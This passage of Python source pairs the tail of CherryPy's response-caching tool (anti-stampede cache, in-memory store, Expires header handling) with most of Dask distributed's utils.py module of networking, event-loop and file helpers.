if debug:
cherrypy.log('No timeout', 'TOOLS.CACHING')
return None
# Wait until it's done or times out.
if debug:
cherrypy.log('Waiting up to %s seconds' %
timeout, 'TOOLS.CACHING')
value.wait(timeout)
if value.result is not None:
# The other thread finished its calculation. Use it.
if debug:
cherrypy.log('Result!', 'TOOLS.CACHING')
return value.result
# Timed out. Stick an Event in the slot so other threads wait
# on this one to finish calculating the value.
if debug:
cherrypy.log('Timed out', 'TOOLS.CACHING')
e = threading.Event()
e.result = None
dict.__setitem__(self, key, e)
return None
elif value is None:
# Stick an Event in the slot so other threads wait
# on this one to finish calculating the value.
if debug:
                cherrypy.log('No cached value; storing sentinel Event', 'TOOLS.CACHING')
e = threading.Event()
e.result = None
dict.__setitem__(self, key, e)
return value
def __setitem__(self, key, value):
"""Set the cached value for the given key."""
existing = self.get(key)
dict.__setitem__(self, key, value)
if isinstance(existing, Event):
# Set Event.result so other threads waiting on it have
# immediate access without needing to poll the cache again.
existing.result = value
existing.set()
class MemoryCache(Cache):
"""An in-memory cache for varying response content.
Each key in self.store is a URI, and each value is an AntiStampedeCache.
The response for any given URI may vary based on the values of
"selecting request headers"; that is, those named in the Vary
response header. We assume the list of header names to be constant
for each URI throughout the lifetime of the application, and store
that list in ``self.store[uri].selecting_headers``.
The items contained in ``self.store[uri]`` have keys which are tuples of
request header values (in the same order as the names in its
selecting_headers), and values which are the actual responses.
"""
maxobjects = 1000
"""The maximum number of cached objects; defaults to 1000."""
maxobj_size = 100000
"""The maximum size of each cached object in bytes; defaults to 100 KB."""
maxsize = 10000000
"""The maximum size of the entire cache in bytes; defaults to 10 MB."""
delay = 600
"""Seconds until the cached content expires; defaults to 600 (10 minutes).
"""
antistampede_timeout = 5
"""Seconds to wait for other threads to release a cache lock."""
expire_freq = 0.1
"""Seconds to sleep between cache expiration sweeps."""
debug = False
def __init__(self):
self.clear()
# Run self.expire_cache in a separate daemon thread.
t = threading.Thread(target=self.expire_cache, name='expire_cache')
self.expiration_thread = t
t.daemon = True
t.start()
def clear(self):
"""Reset the cache to its initial, empty state."""
self.store = {}
self.expirations = {}
self.tot_puts = 0
self.tot_gets = 0
self.tot_hist = 0
self.tot_expires = 0
self.tot_non_modified = 0
self.cursize = 0
def expire_cache(self):
"""Continuously examine cached objects, expiring stale ones.
This function is designed to be run in its own daemon thread,
referenced at ``self.expiration_thread``.
"""
# It's possible that "time" will be set to None
# arbitrarily, so we check "while time" to avoid exceptions.
# See tickets #99 and #180 for more information.
while time:
now = time.time()
# Must make a copy of expirations so it doesn't change size
# during iteration
items = list(six.iteritems(self.expirations))
for expiration_time, objects in items:
if expiration_time <= now:
for obj_size, uri, sel_header_values in objects:
try:
del self.store[uri][tuple(sel_header_values)]
self.tot_expires += 1
self.cursize -= obj_size
except KeyError:
# the key may have been deleted elsewhere
pass
del self.expirations[expiration_time]
time.sleep(self.expire_freq)
def get(self):
"""Return the current variant if in the cache, else None."""
request = cherrypy.serving.request
self.tot_gets += 1
uri = cherrypy.url(qs=request.query_string)
uricache = self.store.get(uri)
if uricache is None:
return None
header_values = [request.headers.get(h, '')
for h in uricache.selecting_headers]
variant = uricache.wait(key=tuple(sorted(header_values)),
timeout=self.antistampede_timeout,
debug=self.debug)
if variant is not None:
self.tot_hist += 1
return variant
def put(self, variant, size):
"""Store the current variant in the cache."""
request = cherrypy.serving.request
response = cherrypy.serving.response
uri = cherrypy.url(qs=request.query_string)
uricache = self.store.get(uri)
if uricache is None:
uricache = AntiStampedeCache()
uricache.selecting_headers = [
e.value for e in response.headers.elements('Vary')]
self.store[uri] = uricache
if len(self.store) < self.maxobjects:
total_size = self.cursize + size
# checks if there's space for the object
if (size < self.maxobj_size and total_size < self.maxsize):
# add to the expirations list
expiration_time = response.time + self.delay
bucket = self.expirations.setdefault(expiration_time, [])
bucket.append((size, uri, uricache.selecting_headers))
# add to the cache
header_values = [request.headers.get(h, '')
for h in uricache.selecting_headers]
uricache[tuple(sorted(header_values))] = variant
self.tot_puts += 1
self.cursize = total_size
def delete(self):
"""Remove ALL cached variants of the current resource."""
uri = cherrypy.url(qs=cherrypy.serving.request.query_string)
self.store.pop(uri, None)
def get(invalid_methods=('POST', 'PUT', 'DELETE'), debug=False, **kwargs):
"""Try to obtain cached output. If fresh enough, raise HTTPError(304).
If POST, PUT, or DELETE:
* invalidates (deletes) any cached response for this resource
* sets request.cached = False
* sets request.cacheable = False
else if a cached copy exists:
* sets request.cached = True
* sets request.cacheable = False
* sets response.headers to the cached values
* checks the cached Last-Modified response header against the
current If-(Un)Modified-Since request headers; raises 304
if necessary.
* sets response.status and response.body to the cached values
* returns True
otherwise:
* sets request.cached = False
* sets request.cacheable = True
* returns False
"""
request = cherrypy.serving.request
response = cherrypy.serving.response
if not hasattr(cherrypy, '_cache'):
# Make a process-wide Cache object.
cherrypy._cache = kwargs.pop('cache_class', MemoryCache)()
# Take all remaining kwargs and set them on the Cache object.
for k, v in kwargs.items():
setattr(cherrypy._cache, k, v)
cherrypy._cache.debug = debug
# POST, PUT, DELETE should invalidate (delete) the cached copy.
# See http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.10.
if request.method in invalid_methods:
if debug:
cherrypy.log('request.method %r in invalid_methods %r' %
(request.method, invalid_methods), 'TOOLS.CACHING')
cherrypy._cache.delete()
request.cached = False
request.cacheable = False
return False
if 'no-cache' in [e.value for e in request.headers.elements('Pragma')]:
request.cached = False
request.cacheable = True
return False
cache_data = cherrypy._cache.get()
request.cached = bool(cache_data)
request.cacheable = not request.cached
if request.cached:
# Serve the cached copy.
max_age = cherrypy._cache.delay
for v in [e.value for e in request.headers.elements('Cache-Control')]:
atoms = v.split('=', 1)
directive = atoms.pop(0)
if directive == 'max-age':
if len(atoms) != 1 or not atoms[0].isdigit():
raise cherrypy.HTTPError(
400, 'Invalid Cache-Control header')
max_age = int(atoms[0])
break
elif directive == 'no-cache':
if debug:
cherrypy.log(
'Ignoring cache due to Cache-Control: no-cache',
'TOOLS.CACHING')
request.cached = False
request.cacheable = True
return False
if debug:
cherrypy.log('Reading response from cache', 'TOOLS.CACHING')
s, h, b, create_time = cache_data
age = int(response.time - create_time)
if (age > max_age):
if debug:
cherrypy.log('Ignoring cache due to age > %d' % max_age,
'TOOLS.CACHING')
request.cached = False
request.cacheable = True
return False
# Copy the response headers. See
# https://github.com/cherrypy/cherrypy/issues/721.
response.headers = rh = httputil.HeaderMap()
for k in h:
dict.__setitem__(rh, k, dict.__getitem__(h, k))
# Add the required Age header
response.headers['Age'] = str(age)
try:
# Note that validate_since depends on a Last-Modified header;
# this was put into the cached copy, and should have been
# resurrected just above (response.headers = cache_data[1]).
cptools.validate_since()
except cherrypy.HTTPRedirect:
x = sys.exc_info()[1]
if x.status == 304:
cherrypy._cache.tot_non_modified += 1
raise
# serve it & get out from the request
response.status = s
response.body = b
else:
if debug:
cherrypy.log('request is not cached', 'TOOLS.CACHING')
return request.cached
def tee_output():
"""Tee response output to cache storage. Internal."""
# Used by CachingTool by attaching to request.hooks
request = cherrypy.serving.request
if 'no-store' in request.headers.values('Cache-Control'):
return
def tee(body):
"""Tee response.body into a list."""
if ('no-cache' in response.headers.values('Pragma') or
'no-store' in response.headers.values('Cache-Control')):
for chunk in body:
yield chunk
return
output = []
for chunk in body:
output.append(chunk)
yield chunk
# save the cache data
body = ntob('').join(output)
cherrypy._cache.put((response.status, response.headers or {},
body, response.time), len(body))
response = cherrypy.serving.response
response.body = tee(response.body)
def expires(secs=0, force=False, debug=False):
"""Tool for influencing cache mechanisms using the 'Expires' header.
secs
Must be either an int or a datetime.timedelta, and indicates the
number of seconds between response.time and when the response should
expire. The 'Expires' header will be set to response.time + secs.
If secs is zero, the 'Expires' header is set one year in the past, and
the following "cache prevention" headers are also set:
* Pragma: no-cache
        * Cache-Control: no-cache, must-revalidate
force
If False, the following headers are checked:
* Etag
* Last-Modified
* Age
* Expires
If any are already present, none of the above response headers are set.
"""
response = cherrypy.serving.response
headers = response.headers
cacheable = False
if not force:
# some header names that indicate that the response can be cached
for indicator in ('Etag', 'Last-Modified', 'Age', 'Expires'):
if indicator in headers:
cacheable = True
break
if not cacheable and not force:
if debug:
cherrypy.log('request is not cacheable', 'TOOLS.EXPIRES')
else:
if debug:
cherrypy.log('request is cacheable', 'TOOLS.EXPIRES')
if isinstance(secs, datetime.timedelta):
secs = (86400 * secs.days) + secs.seconds
if secs == 0:
if force or ('Pragma' not in headers):
headers['Pragma'] = 'no-cache'
if cherrypy.serving.request.protocol >= (1, 1):
if force or 'Cache-Control' not in headers:
headers['Cache-Control'] = 'no-cache, must-revalidate'
# Set an explicit Expires date in the past.
expiry = httputil.HTTPDate(1169942400.0)
else:
expiry = httputil.HTTPDate(response.time + secs)
if force or 'Expires' not in headers:
headers['Expires'] = expiry
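# A minimal config-file sketch for the expires tool above (assumption: the
# tool's config keys mirror the keyword arguments of expires()):
#
#   [/]
#   tools.expires.on = True
#   tools.expires.secs = 3600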
|
utils.py
|
import asyncio
from asyncio import TimeoutError
import atexit
import click
from collections import deque, OrderedDict, UserDict
from concurrent.futures import ThreadPoolExecutor, CancelledError # noqa: F401
from contextlib import contextmanager, suppress
import functools
from hashlib import md5
import html
import json
import logging
import multiprocessing
import os
import re
import shutil
import socket
from time import sleep
import importlib
from importlib.util import cache_from_source
import inspect
import sys
import tempfile
import threading
import warnings
import weakref
import pkgutil
import base64
import tblib.pickling_support
import xml.etree.ElementTree
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa
format_bytes,
funcname,
format_time,
parse_bytes,
parse_timedelta,
)
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS, get_running_loop
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import required_packages, optional_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
    ValueError is raised if the interface does not have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
"""Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with suppress(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
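# A minimal sketch (hypothetical coroutine futures) of how All/Any above are
# awaited from inside another coroutine:
#
#   async def gather_everything(futures):
#       return await All(futures, quiet_exceptions=(OSError,))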
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
    # Tornado's PollIOLoop doesn't raise when used after being closed, so check ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
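# A minimal usage sketch for LoopRunner (assumption: called from an ordinary
# synchronous thread with a hypothetical coroutine function fetch_data):
#
#   runner = LoopRunner()
#   runner.start()                       # IO loop now runs in its own thread
#   result = runner.run_sync(fetch_data)
#   runner.stop()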
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
    >>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
    >>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
    >>> key_split_group('x')
    'x'
    >>> key_split_group('x-1')
    'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return key_split(x)
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def tokey(o):
"""Convert an object to a string.
Examples
--------
>>> tokey(b'x')
b'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is str or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
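# A worked example for seek_delimiter (illustrative, using io.BytesIO in place
# of a real file object):
#
#   f = io.BytesIO(b"abc\ndef\nghi")
#   f.seek(5)                            # somewhere inside the second record
#   seek_delimiter(f, b"\n", blocksize=4)
#   f.tell()                             # -> 8, just past the second b"\n"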
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
try:
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
        The object to be converted. Will correctly handle
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
